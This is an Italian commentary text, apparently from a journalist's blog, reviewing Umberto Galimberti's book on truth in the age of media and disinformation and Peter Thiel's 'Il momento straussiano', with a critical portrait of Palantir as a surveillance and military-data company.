Nel libro «Le disavventure della verità», il filosofo Umberto Galimberti affronta così il tema della verità in un’ottica comparata confrontando Marx, Nietsche e Freud nelle loro pubblicazioni meno note. Ovviamente con riferimento alla Repubblica di Platone e a quello sfortunato che informò i cavernicoli che erano oggetto di un’illusione (disinformazione, diremmo oggi). Lo sfortunato fu bastonato dai cavernicoli per la sua rivelazione.

[…] a differenza dei tempi trascorsi, oggi l’abbondanza delle informazioni, che è il tratto tipico del nostro tempo, ci rende responsabili di ciò che sappiamo e se, per quieto vivere, per noia, per distrazione, per disinteresse, per stanchezza o per assuefazione, non siamo sensibili al problema della verità, di fronte a quel che sappiamo diventiamo irrimediabilmente indifferenti, quando non addirittura immorali.

Oggi, infatti, dobbiamo chiederci che ne è della verità nella nostra epoca caratterizzata dall’incontenibile diffusione dei media, ai quali da ultimo si sono aggiunti i social con le loro vere e false notizie e prese di posizioni, per lo più acritiche, quando non puri sfoghi pulsionali o emotivi. Per affrontare questo tema bisogna liquidare quei luoghi comuni, per non dire idee arretrate che fanno da tacita guida a quasi tutte le riflessioni sui media, secondo le quali l’uomo può usare i mezzi di comunicazione come qualcosa di neutrale rispetto alla sua natura… […]

Al tempo della guerra ibrida, quella che mescola la falsa informazione alle azioni militari, il sabotaggio della verità ci riguarda tutti.

«Le disavventure della verità», Umberto Galimberti, Feltrinelli, 2025

dicorinto.it/articoli/recensio…

Palantir è il nuovo potere della sorveglianza globale. Anche i Servizi Segreti francesi hanno ammesso di usarne tecnologia e capacità di analisi. E lo fanno pure la Ferrari, Stellantis, il Policlinico Gemelli in Italia.
I software di Palantir sono in uso anche all’esercito israeliano. Il suo board nel 2024 ha tenuto una seduta del consiglio di amministrazione a Tel Aviv in segno di solidarietà dopo l’attacco terroristico del 7 ottobre 2023.

Ma che cos’è Palantir? Palantir è la nuova macchina del potere americano creata da Peter Thiel, il magnate che ha fondato l’azienda prendendone il nome dalla saga del Signore degli Anelli. Palantir è l’occhio che tutto vede e che nella saga consente ai cattivi di intimidire, trovare e punire, non i cattivi, ma i buoni della storia, cioè la famosa compagnia dell’Anello.

Nella prospettiva di Thiel e di Alex Karp, attuale Ceo di Palantir, però è tutto rovesciato. L’occhio che tutto vede, cioè i suoi software Gotham e Foundry, potenziati dal coordinamento di una terza piattaforma, Apollo, e dall’intelligenza artificiale IAP, sono gli strumenti della nuova sorveglianza che sovrintende alla macchina da guerra americana e degli eserciti che se lo possono permettere. Come quello di Israele.

Palantir è una macchina indifferente all’etica e alla morale occidentale e illuministica.
Dopo alcuni servizi giornalistici sappiamo che Palantir, vende dati per fare la guerra. E poi li usa per foraggiare il suo spin off, Anduril, azienda dedicata alla produzione di IA e droni da combattimento.

Ma è solo nel libro «Il momento straussiano» che capiamo perché Peter Thiel, tecnologo, gay, cattolico, conservatore, con Palantir si sia definitivamente sganciato dalla retorica di benessere, progresso e uguaglianza prodotta dall’immaginifica
industria della Silicon Valley negli ultimi 30 anni fino a farla ribaltare nelle sue convinzioni più profonde, un tempo basate sul «don’t be evil» (non fare il male).
Nel libro Thiel lo spiega. E quello che dice fa venire i brividi, affermando che l’Occidente deve farsi rispettare usando la violenza e la deterrenza quali elementi attivi di civilizzazione e di difesa della sua missione teleologica e salvifica del mondo.
Usando cioè i mezzi contrari alla cultura occidentale dei diritti che essa dovrebbero affermare e perseguire.

«Peter Thiel, Il momento straussiano. A cura di Andrea Venanzoni. Liberilibri 2025»

dicorinto.it/articoli/recensio…